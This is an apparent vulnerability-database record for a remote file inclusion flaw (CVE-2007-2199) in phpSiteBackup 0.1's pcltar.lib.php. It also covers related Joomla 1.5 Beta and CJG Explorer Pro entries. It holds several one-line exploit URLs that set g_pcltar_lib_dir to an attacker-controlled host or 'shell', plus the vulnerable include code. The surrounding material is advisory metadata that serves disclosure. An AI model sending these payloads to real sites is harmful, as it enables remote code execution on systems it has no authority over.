ID EDB-ID:4111
Type exploitdb
Reporter GoLd_M
Modified 2007-06-26T00:00:00
Description
phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion Vulnerability. CVE-2007-2199. Webapps exploit for php platform
# phpSiteBackup 0.1 (pcltar.lib.php) Remote File Include Vulnerability
# D.Script:
http://kent.dl.sourceforge.net/sourceforge/phpsitebackup/phpSiteBackup-0.1.tgz
# Exploit:
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://localhost/tryag.txt?
# D.Vidoe:
http://my-story.org/uploads/phpSiteBackup.rar
# Discovered by:
GoLd_M = [Mahmood_ali]
# Homepage:
http://www.Tryag.Com/cc
# Greetz To:
Tryag-Team & AsbMay's Group & Crackers_Child & Rf7awy & t0pP8uZz :D
# milw0rm.com [2007-06-26]
{"id": "EDB-ID:4111", "hash": "a8d95447a979646a05676450e3816996", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpSiteBackup 0.1 pcltar.lib.php Remote File Inclusion Vulnerability", "description": "phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion Vulnerability. CVE-2007-2199. Webapps exploit for php platform", "published": "2007-06-26T00:00:00", "modified": "2007-06-26T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4111/", "reporter": "GoLd_M", "references": [], "cvelist": ["CVE-2007-2199"], "lastseen": "2016-01-31T20:10:57", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-01-31T20:10:57"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2199"]}, {"type": "osvdb", "idList": ["OSVDB:36009", "OSVDB:34803"]}, {"type": "canvas", "idList": ["CEP_INCLUDE", "PHPSITEBACKUP_INCLUDE"]}, {"type": "exploitdb", "idList": ["EDB-ID:3781", "EDB-ID:3915"]}], "modified": "2016-01-31T20:10:57"}, "vulnersScore": 7.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4111/", "sourceData": "# phpSiteBackup 0.1 (pcltar.lib.php) Remote File Include Vulnerability\n\n# D.Script:\n \nhttp://kent.dl.sourceforge.net/sourceforge/phpsitebackup/phpSiteBackup-0.1.tgz\n\n# Exploit:\n \n/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://localhost/tryag.txt?\n\n# D.Vidoe:\n http://my-story.org/uploads/phpSiteBackup.rar\n\n# Discovered by:\n GoLd_M = [Mahmood_ali]\n\n# Homepage:\n http://www.Tryag.Com/cc\n\n# Greetz To:\n Tryag-Team & AsbMay's Group & Crackers_Child & Rf7awy & t0pP8uZz :D\n\n# milw0rm.com [2007-06-26]\n", "osvdbidlist": ["36009"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter.", "modified": "2018-10-16T16:42:00", "id": "CVE-2007-2199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2199", "published": "2007-04-24T20:19:00", "title": "CVE-2007-2199", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-05-29T17:19:30", "bulletinFamily": "exploit", "description": "**Name**| phpsitebackup_include \n---|--- \n**CVE**| CVE-2007-2199 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| phpSiteBack Include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: phpsitebackup \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2199 \nCVE Name: CVE-2007-2199 \n\n", "modified": "2007-04-24T20:19:00", "published": "2007-04-24T20:19:00", "id": "PHPSITEBACKUP_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/phpsitebackup_include", "type": "canvas", "title": "Immunity Canvas: PHPSITEBACKUP_INCLUDE", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-09-25T14:13:03", "bulletinFamily": "exploit", "description": "**Name**| cep_include \n---|--- \n**CVE**| CVE-2007-2199 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CJG EXPLORER PRO Remote file inclusion \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: Zascom \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2199 \nCVE Name: CVE-2007-2199 \n\n", "modified": "2007-04-24T16:19:00", "published": "2007-04-24T16:19:00", "id": "CEP_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/cep_include", "type": "canvas", "title": "Immunity Canvas: CEP_INCLUDE", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:17:15", "bulletinFamily": "exploit", "description": "Joomla 1.5.0 Beta (pcltar.php) Remote File Inclusion Vulnerability. CVE-2007-2199. Webapps exploit for php platform", "modified": "2007-04-23T00:00:00", "published": "2007-04-23T00:00:00", "id": "EDB-ID:3781", "href": "https://www.exploit-db.com/exploits/3781/", "type": "exploitdb", "title": "Joomla 1.5.0 Beta pcltar.php Remote File Inclusion Vulnerability", "sourceData": "Hi,\nJoomla! 1.5.0 is in Beta version and \"should NOT to be used for `live`\nor `production` sites.\"\nJoomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt\nhave a good security approach. Anyway, there is a remote file inclusion\nin Joomla 1.5.0 Beta :\n\nFile /libraries/pcl/pcltar.php, Line 74 :\n if (!defined(\"PCLERROR_LIB\"))\n {\n include($g_pcltar_lib_dir.\"/pclerror.lib.\".$g_pcltar_extension);\n }\n\nPOC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?\n\nThe original advisory (in Persian) is located at :\nhttp://www.hackers.ir/advisories/joomla.html\n\n\n- Omid\n\n# milw0rm.com [2007-04-23]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3781/"}, {"lastseen": "2016-01-31T19:36:08", "bulletinFamily": "exploit", "description": "CJG EXPLORER PRO 3.2 (g_pcltar_lib_dir) RFI Vulnerabilities. CVE-2007-2199,CVE-2007-2660. Webapps exploit for php platform", "modified": "2007-05-13T00:00:00", "published": "2007-05-13T00:00:00", "id": "EDB-ID:3915", "href": "https://www.exploit-db.com/exploits/3915/", "type": "exploitdb", "title": "CJG EXPLORER PRO 3.2 g_pcltar_lib_dir RFI Vulnerabilities", "sourceData": "#######################S==A==U==D==I#########################\n\nCJG EXPLORER PRO v3.2 (pcltar.lib.php)(pcltrace.lib.php) Remote File\nInclude Vulnerabilities\n\n##############################################################\n\nFound By : Mogatil , jjl@hotmail.com\n\n##############################################################\n\nScript Site :\nhttp://www.zascom.com/download/PHP/1868-CEP-PHP.ZIP\n##############################################################\nFile : /pcltar.lib.php\ninclude($g_pcltar_lib_dir.\"/pclerror.lib.php\");\n\nFile : /pcltrace.lib.php\ninclude($g_pcltar_lib_dir.\"/pclerror.lib.php\");\n\n\n\n##############################################################\n\nThanx: [cold zero] [gawey Al Azary] [crazy man] [scorbion_22]\n[the_muslim_sniper]\n\n##############################################################\n\nExploit :[Path]cep/lib/pcltar.lib.php?g_pcltar_lib_dir=shell\n\nExploit :[Path]cep/lib/pcltrace.lib.php?g_pcltar_lib_dir=shell\n\n##############################################################\n\n# milw0rm.com [2007-05-13]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3915/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://[attacker]/?\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0388.html\n[CVE-2007-2199](https://vulners.com/cve/CVE-2007-2199)\n", "modified": "2007-04-24T19:36:51", "published": "2007-04-24T19:36:51", "href": "https://vulners.com/osvdb/OSVDB:34803", "id": "OSVDB:34803", "title": "Joomla libraries/pcl/pcltar.php g_pcltar_lib_dir Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\n/[Path]cep/lib/pcltar.lib.php?g_pcltar_lib_dir=shell\n## References:\n[Secunia Advisory ID:25230](https://secuniaresearch.flexerasoftware.com/advisories/25230/)\n[Related OSVDB ID: 36010](https://vulners.com/osvdb/OSVDB:36010)\nOther Advisory URL: http://milw0rm.com/exploits/3915\nOther Advisory URL: http://www.hackers.ir/advisories/joomla.html\nMail List Post: http://www.attrition.org/pipermail/vim/2007-May/001618.html\nISS X-Force ID: 34273\nISS X-Force ID: 35092\nISS X-Force ID: 33837\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4111\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3781\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3915\nFrSIRT Advisory: ADV-2007-1511\n[CVE-2007-2199](https://vulners.com/cve/CVE-2007-2199)\nBugtraq ID: 23613\nBugtraq ID: 25528\nBugtraq ID: 23708\nBugtraq ID: 24660\n", "modified": "2007-05-13T04:49:03", "published": "2007-05-13T04:49:03", "href": "https://vulners.com/osvdb/OSVDB:36009", "id": "OSVDB:36009", "title": "cjgExplorerPro lib/pcltar.lib.php g_pcltar_lib_dir Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}